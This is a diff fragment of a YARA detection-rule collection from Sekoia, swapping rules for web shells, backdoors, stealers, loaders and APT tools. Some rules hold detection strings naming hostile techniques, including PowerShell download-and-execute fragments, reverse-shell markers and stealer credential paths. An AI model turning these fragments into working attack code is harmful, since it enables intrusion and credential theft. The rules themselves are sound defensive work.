-		( uint16( 0 ) == 0x5A4D and all of ( $dll_150_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "2cf9797b1cfb5795d0fb892b7c371d506a5dd8b7c64fdc82975b3fde6d997df0" ) ) or ( uint16( 0 ) == 0x5A4D and all of ( $dll_50_* ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" ) )
+		uint16( 0 ) == 0x5A4D and all of them or pe.imphash ( ) == "75a9ae7d4394abdc30e2a873908fa09d" or hash.md5 ( pe.rich_signature.clear_data ) == "06b2ec5892ac9ad566693b04cf427f3f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "612006b6f68cd0b8b0d48252dbdef4be" )
 }
-rule SEKOIA_Apt_Unk_Hrserv_Memory_Commands_Strings
+rule SEKOIA_Apt_Kimsuky_Sharpext_Compromised_Securepreferences
 {
 	meta:
-		description = "Detects HrServ web shell memory commands"
+		description = "Detects compromised Chrome SecurePreferences file"
 		author = "Sekoia.io"
-		id = "1b5f442a-e758-4bd5-a612-8b504a542d29"
-		date = "2023-11-23"
+		id = "aeda5d15-82e1-4ffc-8252-1eb4fc78d024"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unk_hrserv_memory_commands_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a87c35658ded301c098f9ee8ee5886a54e89537eabd145cf82b0286c703a77d2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharpext_compromised_securepreferences.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "662358fdb4c4cfa9984d06e391ade52e1c7a3d7b78724aea4fb0d6035fe2e7b2"
 		score = 75
 		quality = 80
 		tags = ""
@@ -229895,81 +230590,84 @@ rule SEKOIA_Apt_Unk_Hrserv_Memory_Commands_Strings
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "list all the process" ascii wide
-		$ = "equal with cmd /c tasklist" ascii wide
-		$ = "start target service by name" ascii wide
-		$ = "query local process information by wmi." ascii wide
-		$ = "upload local shellcode to" ascii wide
+		$ = "\"devtools\", \"tabs\", \"webNavigation\", \"webRequest\", \"webRequestBlocking\""
+		$ = "AppData\\\\Roaming"
+		$ = "https://*/*"
 
 	condition:
 		all of them
 }
-rule SEKOIA_Apt_Unknown_Sessionmanageriis_Strings : FILE
+rule SEKOIA_Loader_Win_Goshellcode : FILE
 {
 	meta:
-		description = "Detects the IIS SessionManager backdoor"
+		description = "Finds GoShellcode samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "7d55dd82-509f-444d-a1ba-6417b51f392f"
-		date = "2022-07-04"
+		id = "61346225-325a-4067-a4d6-3b8c001dd380"
+		date = "2023-11-15"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unknown_sessionmanageriis_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b1058b07c8e40431f8f3841b5ad49b4d6ead21a91d014f24c083f37eeacc5ac5"
+		reference = "https://github.com/yoda66/GoShellcode/blob/main/gosc.go"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_goshellcode.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "48ec87f284fbd14cbdb6b6b0f2e0fa6eb5ea19f112648660e0b8e525c562e3fc"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "94445af999055bf7d7cddc0d1d5183ab2776d85285f0522a28fac6c5a6101906"
+		hash2 = "fdea8b01b2597ceafe6f08b5fd12cc603b1e3ce2037731c0b6defde6935b1ce0"
 
 	strings:
-		$ = "Wokring OK"
-		$ = "Delete File Success :"
-		$ = "Delete File Error :"
-		$ = "SM_SESSION="
-		$ = "SM_SESSIONID"
-		$ = "attachment; filename ="
-		$ = "CHttpModule::"
+		$str01 = "main.VirtualAlloc" ascii
+		$str02 = "main.RtlMoveMemory" ascii
+		$str03 = "syscall.Syscall" ascii
+		$str04 = "syscall.NewLazyDLL" ascii
+		$str05 = "runtime.getGetProcAddress" ascii
+		$str06 = "runtime.useAeshash" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 400KB and 4 of them
+		uint16( 0 ) == 0x5A4D and all of ( $str* ) and filesize < 8MB
 }
-rule SEKOIA_Apt_Mustang_Panda_Nupakage : FILE
+rule SEKOIA_Apt_Unk_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detects NUPAKAGE malware (only PDB, too much false positives)"
+		description = "Detects a malicious LNK used by an APT"
 		author = "Sekoia.io"
-		id = "bd62c220-addc-48e9-bd01-2eff687ac3ce"
-		date = "2023-03-24"
+		id = "d2248803-7ddf-4cde-ab6a-78b20e760919"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustang_panda_nupakage.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "255c77af714b1b66275f3973fb112994ccb028d5d60562bbde30df5a761f03d3"
-		score = 50
-		quality = 78
+		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unk_malicious_lnk.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "a8d7e56eb01a8cf576533db9af2e92ec"
+		logic_hash = "993411ceba45d1212a4840e6a35b72b52e64e78cbb2599ebc5c70c2fd3b8e552"
+		score = 75
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "D:\\Project\\NEW_PACKAGE_FILE\\Release\\NEW_PACKAGE_FILE.pdb" ascii wide
+		$ = ".pdf.lnkPK"
+		$ = ".jfifPK"
+		$ = ".batPK"
+		$ = ".pdfPK"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		uint32be( 0 ) == 0x504b0304 and all of them
 }
-rule SEKOIA_Tool_Quarkspwdump : FILE
+rule SEKOIA_Apt_Gamaredon_Powerrevshell : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Powershell reverse shell"
 		author = "Sekoia.io"
-		id = "859823f9-6d47-4b0f-844b-d3af7bad498b"
-		date = "2023-06-23"
+		id = "b5161c23-c607-4096-9f4a-1be516a0a614"
+		date = "2023-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_quarkspwdump.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4799e1d1c749a536d7920e3c333d69f7130376c6a0f0e0ca8f0b61e438266adb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_powerrevshell.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fc5abcdf47641c1e7978cf076550f38987305bb2171b3e65f7865102a065af43"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229977,25 +230675,27 @@ rule SEKOIA_Tool_Quarkspwdump : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "quarks-pwdump.exe"
-		$s2 = "--------------------------------------------- BEGIN DUMP --------------------------------------------"
-		$s3 = "%s_hist%d:\"\":\"\":%s:%s"
+		$ = "iex $enc.GetString("
+		$ = "$stream.Write"
+		$ = ".).FullName"
+		$ = "Sockets.TcpClient"
+		$ = "\">\";"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		all of them and filesize < 3000
 }
-rule SEKOIA_Infostealer_Win_44Caliber : FILE
+rule SEKOIA_Guloader_Lnk_File : FILE
 {
 	meta:
-		description = "Finds samples of the 44Caliber stealer"
+		description = "LNK file delivering Guloader"
 		author = "Sekoia.io"
-		id = "44e5bbc1-f442-47d3-8431-25182f38439d"
-		date = "2022-03-08"
+		id = "ecc07753-0910-445b-bf84-911b17195894"
+		date = "2024-02-07"
 		modified = "2024-12-19"
-		reference = "https://github.com/razexgod/44CALIBER"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_44caliber.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4b80d6b2116f53926897aa79a7c232413974caefaf524f50e6a7cede11f3aaa0"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/guloader_lnk_file.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d69038a8b26c7fc7ba7b0968c7c91b589b25512dcf7e3ad5ee56453a4654a1ab"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230003,59 +230703,54 @@ rule SEKOIA_Infostealer_Win_44Caliber : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "44 CALIBER" fullword ascii
-		$str1 = "https://api.vimeworld.ru/user/name/" wide
-		$str2 = "https://freegeoip.app/xml/" wide
-		$str3 = "SOFTWARE\\Wow6432Node\\Valve\\Steam" wide
-		$str4 = "VPN\\NordVPN\\\\accounts.txt" wide
-		$str5 = "OpenVPN Connect\\profiles" wide
-		$str6 = "FuckTheSystem Copyright" wide
-		$str7 = "lolz.guru" wide
-		$str8 = "xss.is" wide
-		$str9 = "Test message recieved successfully! :raised_hands:" wide
-		$str10 = "Specify a single character: either D or F" wide
+		$s1 = "$PSHOME" wide
+		$s2 = "&(${" wide
+		$s3 = "}::ToString(" wide
+		$s4 = "$([TYPE]${" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of ( $str* ) and filesize > 100KB and filesize < 1MB
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Apt_Badmagic_Generic_Pshscript : FILE
+rule SEKOIA_Loader_Fakebat_Initial_Powershell_May24 : FILE
 {
 	meta:
-		description = "Detects BadMagic generic powershell script (Possible FPs)"
+		description = "Finds FakeBat initial PowerShell script downloading and executing the next-stage payload."
 		author = "Sekoia.io"
-		id = "82cda554-3c2b-4c04-b9f9-b5ba50c53271"
-		date = "2023-05-15"
+		id = "adf0e4fc-fa98-470b-9535-bd30d0bdb3aa"
+		date = "2024-05-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_generic_pshscript.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f442e1ba815cc7eae0c627db5ad1917021d69b8ce37155923a0f19776aeba95d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_fakebat_initial_powershell_may24.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6a699df361b0cb2baf1d0b128f795aa9918ebe11daaeb1fa49aebf9320add762"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-06-21"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ExecutablePath"
-		$ = "Start-Sleep -Second 2"
+		$str01 = "='http" wide
+		$str02 = "=(iwr -Uri $" wide
+		$str03 = " -UserAgent $" wide
+		$str04 = " -UseBasicParsing).Content; iex $" wide
 
 	condition:
-		all of them and filesize < 1KB
+		3 of ( $str* ) and filesize < 1KB and true
 }
-
-rule SEKOIA_Tool_Impersonate_Strings : FILE
+rule SEKOIA_Tool_Runpeinmemory_Strings : FILE
 {
 	meta:
-		description = "Detects Impersonate"
+		description = "Detects standard implementation of RunPEInMemory"
 		author = "Sekoia.io"
-		id = "2ab345a2-9366-4673-b398-a59ba6954af5"
-		date = "2024-07-24"
+		id = "64129ab0-b599-4760-ab21-20c475c2c07f"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_impersonate_strings.yar#L3-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "63c46a2d97d0a8360351b8906665186c5ad2dcaa6f2edba6da7bf4de2ce00241"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_runpeinmemory_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "154f3db98f8ee902ec7b58812525dbbef837ae30279c40b8d95ec93ae1260a69"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230063,31 +230758,25 @@ rule SEKOIA_Tool_Impersonate_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[*] Listing available tokens"
-		$ = "[ID: %2d][SESSION: %d][INTEGRITY: %-6ws][%-18ws][%-22ws] User: %ws"
-		$ = "[*] Impersonating %ws"
-		$ = "[!] Impersonation failed error: %d"
-		$ = "[*] Adding user %ls on %ls"
-		$ = "[!] Add user failed with error: %d"
-		$ = "[*] Adding user %ws to domain group %ws"
-		$ = "[!] Add user in domain %ws failed with error: %d"
-		$ = "[!] Couldn't change token session id (error: %d)"
+		$ = "[+] Fix Import Address Table"
+		$ = "[+] Relocation Fixed."
+		$ = "[+] File %s isn't a PE file."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them or pe.imphash ( ) == "e14ce763114276674e22b7b8b637bd4b"
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Loader_Win_Aresloader : FILE
+rule SEKOIA_Tool_Sharpnbtscan_Strings : FILE
 {
 	meta:
-		description = "Finds AresLoader samples based on characteristic strings"
+		description = "Detects SharpNBTScan based on strings"
 		author = "Sekoia.io"
-		id = "bf5070fc-c8ca-4458-8702-cd1830667b7a"
-		date = "2023-05-02"
+		id = "e9d28dcb-b4b1-4d66-b225-ed0925f307d9"
+		date = "2024-09-09"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_aresloader.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2edbb625394506e865580373d5c3454b4fa201183c84d247b4373f24e25f5fd4"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_sharpnbtscan_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "adc19140e84c4aa3433b8ae4096355e384bbd106326ed56b54fb44a86fd9fbc6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230095,127 +230784,104 @@ rule SEKOIA_Loader_Win_Aresloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "{\\\"ip\\\": '%s', \\\"UID\\\": '%s', \\\"geo\\\": '%s', \\\"service\\\": '%s', \\\"owner_token\\\": '%s'}" ascii
-		$str02 = "AresLdr_v_3" ascii
-		$str03 = "https://ipinfo.io/ip" ascii
-		$str04 = "C:\\Users\\%s\\AppData\\Roaming\\%s\\%s" ascii
-		$str05 = "/manager/payload" ascii
-		$str06 = "/manager/loader" ascii
-		$str07 = "/manager/legit" ascii
-		$str08 = "/manager/hvnc" ascii
-		$str09 = "C%p %d V=%0X w=%ld %s" ascii
-		$str10 = "rundll32.exe %s,%s" ascii
-		$str11 = "%startinfo" ascii
-		$str12 = "%managedapp" ascii
-		$str13 = "%has_cctor" ascii
+		$ = "[+]Udp client will stop in 10 s ..." ascii wide
+		$ = "[*]Stop udp client ..." ascii wide
+		$ = "[*]Start udp client ..." ascii wide
+		$ = "[+] ip range {0} - {1} " ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint32be( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Konni_Check_Bat : FILE
+
+rule SEKOIA_Loader_Win_Doppeldridex
 {
 	meta:
-		description = "Script used to performs check before executing Konni"
+		description = "Detect the DoppelDridex banking trojan using its Rich header"
 		author = "Sekoia.io"
-		id = "f05e6ba2-c128-4c17-8f74-f7640103c859"
-		date = "2023-11-27"
+		id = "ee5111ae-ba0b-4cd3-abe6-c66324d16840"
+		date = "2021-09-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_konni_check_bat.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "13a9dd6978985eb17960794c6de2ee2e6411e6afeb705ff95ced72bc0efb5d8c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_doppeldridex.yar#L3-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4ceed302cb36b73d98070996ede64742579a261ef3ede6e1eb1723ddca32e839"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		version = "1.0"
+		tags = ""
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = ":64BIT"
-		$ = ":32BIT"
-		$ = ":INSTALL"
-		$ = ":EXIT"
-		$ = "netpp.dll"
-		$ = "wpns.dll"
-		$ = "netpp64.dll"
-		$ = "wpns64.dll"
-		$ = "rundll32"
-
 	condition:
-		filesize < 1MB and 7 of them
+		pe.rich_signature.toolid( 122 , 50727 ) and pe.rich_signature.toolid ( 1 , 0 ) and pe.rich_signature.toolid ( 222 , 40629 ) and pe.rich_signature.toolid ( 131 , 30729 ) and pe.rich_signature.toolid ( 220 , 31101 ) and pe.rich_signature.toolid ( 202 , 60315 ) and pe.rich_signature.toolid ( 202 , 50727 ) and pe.rich_signature.toolid ( 261 , 23506 ) and pe.rich_signature.toolid ( 149 , 21022 ) and pe.rich_signature.toolid ( 261 , 23918 ) and pe.rich_signature.toolid ( 219 , 21005 ) and pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 225 , 21005 ) and pe.rich_signature.toolid ( 221 , 21005 ) and pe.rich_signature.toolid ( 259 , 24210 ) and pe.rich_signature.toolid ( 258 , 24213 ) and pe.rich_signature.toolid ( 158 , 40219 ) and pe.rich_signature.toolid ( 145 , 21022 ) and pe.rich_signature.toolid ( 207 , 60315 ) and pe.rich_signature.toolid ( 256 , 23026 )
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hatvibe
+rule SEKOIA_Zip_Win_Abcloader
 {
 	meta:
-		description = "Detects some suspected UAC-0063/APT28 HTA loader"
+		description = "Use the CRC32 to detect a zip containing the doc file used to drop and launch ABCloader"
 		author = "Sekoia.io"
-		id = "c4e04671-e75f-40a4-a489-79c2ce91cf7a"
-		date = "2024-07-25"
+		id = "0d14b34a-9095-48fa-b616-4e8239f3b547"
+		date = "2024-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_susp_apt28_uac0063_hatvibe.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
-		logic_hash = "41e1f97e45bc42ad3057cc173d036806687223782e54997e7803c888ee394b09"
-		score = 65
-		quality = 28
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/zip_win_abcloader.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "0c7d8e611781b29e15df415640858294"
+		logic_hash = "024d068a86432f35b0f7af0c4cdccb37d0979d01e90f7c9d1ae8a2dddfa3bfc8"
+		score = 75
+		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "& temp(Mid(" ascii fullword
-		$ = ".InnerHTML =" ascii fullword
-		$ = "peceert" ascii fullword
-		$ = "window.setTimeout" ascii fullword
-		$ = "cmdline = Split(" ascii fullword
+		$crc = {32 56 27 e2}
+		$name = "iden.doc"
 
 	condition:
-		3 of them
+		$name at @crc [ 1 ] + 16
 }
-rule SEKOIA_Spyware_And_Fastfire : FILE
+
+rule SEKOIA_Apt_Lazarus_Gopuram_Backdoor : FILE
 {
 	meta:
-		description = "Detect the FastFire malware"
+		description = "Detects Gopuram Backdoor"
 		author = "Sekoia.io"
-		id = "93c0ffd5-faa5-4ead-8848-1c44b459dc29"
-		date = "2022-11-03"
+		id = "947d4ee3-79fa-450b-8482-beafe607baae"
+		date = "2023-04-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/spyware_and_fastfire.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2600fc0a8fc6279936decf80256be1fc8cb581a59ef6646fe48b5885e104365e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_gopuram_backdoor.yar#L3-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c019b65d28a7b0edf408a1a159a7535e7e14593bbd42c8df3201108ed02f96c0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
+		hash2 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
 
 	strings:
-		$funct1 = {22 00 87 18 70 20 f3 ae 40 00 6e 10 f4 ae 00 00 0c 04 1f 04 16 19 13 00 28 23 6e 20 e3 ae 04 00 12 10 6e 20 e5 ae 04 00 1a 00 25 19 6e 20 ea ae 04 00 28 05 0d 00 6e 10 ef ae 00 00 6e 10 da ae 04 00 6e 10 e1 ae 04 00 0a 00 13 01 c8 00 32 10 20 00 1c 00 ea 17 6e 10 73 ad 00 00 0c 00 22 01 60 18 70 10 5d ae 01 00 1a 02 ff 50 6e 20 69 ae 21 00 6e 10 e1 ae 04 00 0a 04 6e 20 64 ae 41 00 6e 10 72 ae 01 00 0c 04 71 20 1d 09 40 00}
-		$funct2 = {22 00 77 00 1a 01 88 56 70 20 f1 02 10 00 15 01 00 10 6e 20 f4 02 10 00 1a 01 80 8d 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 25 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 56 61 6e 20 32 ae 13 00 0a 01 38 01 0b 00 1a 01 23 76 71 10 b3 06 01 00 0c 01 6e 20 22 03 10 00 1a 01 55 66 6e 20 32 ae 13 00 0a 03 38 03 0b 00 1a 03 24 76 71 10 b3 06 03 00 0c 03 6e 20 22 03 30 00 13 03 64 00 15 01 00 08 71 40 07 02 32 10 0c 03 11 03}
-		$s0 = "TokenResult{token="
-		$s1 = "[-] Send Resp Code ="
-		$s2 = "/report_token/report_token.php?token="
-		$s3 = "naver"
-		$s4 = "daum"
-		$s5 = "facebook"
+		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-ms"
+		$xop = {D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE}
+		$opa1 = {48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 ??}
+		$opa2 = {48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ??}
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and ( 1 of ( $funct* ) or all of ( $s* ) )
+		( uint16( 0 ) == 0x4d5a and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
 }
-rule SEKOIA_Tool_Ehole : FILE
+rule SEKOIA_Exploit_Linux_Eop_Polkit_Pkexec_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Polkit Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "7d30ffd0-fada-4ef4-98c3-5572a4e1e140"
-		date = "2023-06-23"
+		id = "de45c29e-432a-4e4f-b700-a016341d56d2"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_ehole.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "df937417b2f8e12f80fbe2edaa0863de6ed7862c117dff2a21255cb7d1d9ad3d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_polkit_pkexec_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "42d04204481c165ba1b5c4ee5ff1094c31400669b0eca041d736473d481e74b7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -230223,58 +230889,50 @@ rule SEKOIA_Tool_Ehole : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
